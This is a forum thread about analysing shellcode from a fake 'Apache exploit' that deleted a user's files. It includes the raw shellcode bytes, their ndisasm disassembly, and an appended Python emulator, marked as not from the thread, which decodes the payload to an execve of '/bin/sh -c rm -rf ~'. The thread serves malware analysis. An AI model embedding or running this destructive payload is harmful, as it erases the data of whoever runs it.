Help On Shellcode?


knives

Hello guys,

Is there an easier way to reverse engineer shellcode to know what the payload did? Is there software to convert shellcode to much more readable output? I've seen and tried software that converts shellcode to assembly language only. Is there a better one?

As there are lots of fraud hacks/exploits posted around, like this one: http://pastebin.com/f5571e439. It might be helpful for everyone as well.

Thanks in advance.


The link that I mentioned says Apache exploit, but if you run that exploit, it will delete your root directory. (I ran it on my BT5 VM.) That's why I said fraud exploit/hack. And I want to know what else it did on my system; that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.


This is not SMC, so it is pretty easy:

$ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u -
00000000  B8FF2F7368        mov eax,0x68732fff
00000005  C1E808            shr eax,0x8
00000008  50                push eax
00000009  B82F62696E        mov eax,0x6e69622f
0000000E  50                push eax
0000000F  89E3              mov ebx,esp
00000011  31C0              xor eax,eax
00000013  50                push eax
00000014  66B87171          mov ax,0x7171
00000018  66355151          xor ax,0x5151
0000001C  6650              push ax
0000001E  B82337712F        mov eax,0x2f713723
00000023  3551515151        xor eax,0x51515151
00000028  50                push eax
00000029  B8233C717C        mov eax,0x7c713c23
0000002E  3551515151        xor eax,0x51515151
00000033  50                push eax
00000034  89E1              mov ecx,esp
00000036  31C0              xor eax,eax
00000038  50                push eax
00000039  66B82D63          mov ax,0x632d
0000003D  6650              push ax
0000003F  89E2              mov edx,esp
00000041  31C0              xor eax,eax
00000043  B064              mov al,0x64
00000045  29C4              sub esp,eax
00000047  31C0              xor eax,eax
00000049  50                push eax
0000004A  51                push ecx
0000004B  52                push edx
0000004C  53                push ebx
0000004D  89E1              mov ecx,esp
0000004F  31D2              xor edx,edx
00000051  31C0              xor eax,eax
00000053  B00B              mov al,0xb
00000055  CD80              int 0x80
00000057  B401              mov ah,0x1
00000059  31DB              xor ebx,ebx
0000005B  CD80              int 0x80 

Let me know if you need more help.
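Added example, not posted by anyone in this thread: a small Python emulator that takes the instruction column of the ndisasm listing above (raw ndisasm lines work too; the address and opcode-byte columns are stripped) and concretely executes the handful of instructions this shellcode uses, so the strings it assembles on the stack and the execve() call it ends in can be read off without running the bytes on a VM. The instruction text below is copied from the listing in the reply above, joined with ';' only to keep the sample short; the emulator class, its stack-top address and the syscall-number table are my own assumptions, not the output of any tool the thread mentions.

```python
import re

# Sample input: the instruction column of the ndisasm listing quoted above, up to
# the execve syscall; ';'-separated here only for brevity (raw ndisasm lines also work).
ASM = """
mov eax,0x68732fff; shr eax,0x8; push eax; mov eax,0x6e69622f; push eax; mov ebx,esp
xor eax,eax; push eax; mov ax,0x7171; xor ax,0x5151; push ax
mov eax,0x2f713723; xor eax,0x51515151; push eax
mov eax,0x7c713c23; xor eax,0x51515151; push eax; mov ecx,esp
xor eax,eax; push eax; mov ax,0x632d; push ax; mov edx,esp
xor eax,eax; mov al,0x64; sub esp,eax
xor eax,eax; push eax; push ecx; push edx; push ebx; mov ecx,esp
xor edx,edx; xor eax,eax; mov al,0xb; int 0x80
"""

REG32 = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}
# sub-register -> (parent, bit shift, mask): ax/al/ah alias parts of eax, etc.
SUBREGS = {f"{r}{s}": (f"e{r}x", sh, m) for r in "abcd"
           for s, sh, m in (("x", 0, 0xFFFF), ("l", 0, 0xFF), ("h", 8, 0xFF))}
SYSCALLS = {0x1: "exit", 0xB: "execve"}            # i386 int 0x80 numbers seen here
PREFIX_RE = re.compile(r"^[0-9A-F]{8}\s+[0-9A-F]+\s+")  # ndisasm address + opcode bytes


class StackStringEmu:
    def __init__(self, stack_top=0xBFFFF000):       # assumed stack address; any value works
        self.regs = dict.fromkeys(REG32, 0)
        self.regs["esp"] = stack_top
        self.mem, self.calls = {}, []               # byte addr -> value; decoded syscalls

    def get(self, name):
        if name in REG32:
            return self.regs[name]
        parent, shift, mask = SUBREGS[name]
        return (self.regs[parent] >> shift) & mask

    def set(self, name, value):
        if name in REG32:
            self.regs[name] = value & 0xFFFFFFFF
        else:                                       # sub-register write keeps the other bits
            parent, shift, mask = SUBREGS[name]
            self.regs[parent] = (self.regs[parent] & ~(mask << shift)) | ((value & mask) << shift)

    def val(self, op):                              # immediate or register operand
        return int(op, 16) if op.startswith("0x") else self.get(op)

    def u32(self, addr):
        return int.from_bytes(bytes(self.mem.get(addr + i, 0) for i in range(4)), "little")

    def cstr(self, addr):                           # NUL-terminated string from the stack
        out = bytearray()
        while self.mem.get(addr, 0):
            out.append(self.mem[addr])
            addr += 1
        return out.decode("latin-1")

    def step(self, mnem, ops):
        if mnem == "mov":
            self.set(ops[0], self.val(ops[1]))
        elif mnem == "xor":
            self.set(ops[0], self.get(ops[0]) ^ self.val(ops[1]))
        elif mnem == "shr":
            self.set(ops[0], self.get(ops[0]) >> self.val(ops[1]))
        elif mnem == "sub":
            self.set(ops[0], self.get(ops[0]) - self.val(ops[1]))
        elif mnem == "push":                        # 'push ax' is a 16-bit push
            size = 4 if ops[0] in REG32 else 2
            self.regs["esp"] -= size
            for i, b in enumerate(self.get(ops[0]).to_bytes(size, "little")):
                self.mem[self.regs["esp"] + i] = b
        elif mnem == "int" and ops == ["0x80"]:
            return self.syscall()
        else:
            raise NotImplementedError(f"{mnem} {ops}")
        return True                                 # keep stepping

    def syscall(self):
        nr = self.regs["eax"]
        name = SYSCALLS.get(nr, f"sys_{nr:#x}")
        if name == "execve":                        # ebx=path, ecx=argv, edx=envp
            argv, p = [], self.regs["ecx"]
            while self.u32(p):                      # walk the NULL-terminated char* array
                argv.append(self.cstr(self.u32(p)))
                p += 4
            self.calls.append({"syscall": name, "path": self.cstr(self.regs["ebx"]),
                               "argv": argv, "envp": self.regs["edx"]})
            return False                            # a successful execve never returns
        self.calls.append({"syscall": name, "ebx": self.regs["ebx"]})
        return name != "exit"


def decode_listing(text):
    """Emulate raw ndisasm output or bare ';'-separated instructions; return the syscalls reached."""
    emu = StackStringEmu()
    for line in text.splitlines():
        for instr in PREFIX_RE.sub("", line.strip()).split(";"):
            mnem, _, rest = instr.strip().partition(" ")
            ops = [o.strip() for o in rest.split(",") if o.strip()]
            if mnem and not emu.step(mnem, ops):
                return emu.calls
    return emu.calls


if __name__ == "__main__":
    for call in decode_listing(ASM):
        print(call)
```

Running it resolves the XOR-masked immediates and the pushed fragments into the actual call: execve("/bin/sh", ["/bin/sh", "-c", "rm -rf ~  "], NULL), which is exactly the behaviour reported earlier in the thread, recovered from the listing alone. Anything the emulator does not model (a memory read, a jump, self-modifying code) raises NotImplementedError rather than guessing, which is the right failure mode for an analysis tool.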


What do you mean, most shellcode will typically be in C?

I think you should read up on how to write shellcode.

http://www.vividmachines.com/shellcode/shellcode.html

http://projectshellcode.com/?q=node/12

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

I know about shell code, I have been through Offensive Security material. Thanks though.

I suspect he means that most shellcode is contained within C code for delivery.

Yes

The link that I mentioned says Apache exploit, but if you run that exploit, it will delete your root directory. (I ran it on my BT5 VM.) That's why I said fraud exploit/hack. And I want to know what else it did on my system; that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.

Sometimes that is done intentionally to stop noobs from just copy/pasting the exploit. You have to modify the code to make things work anyway.

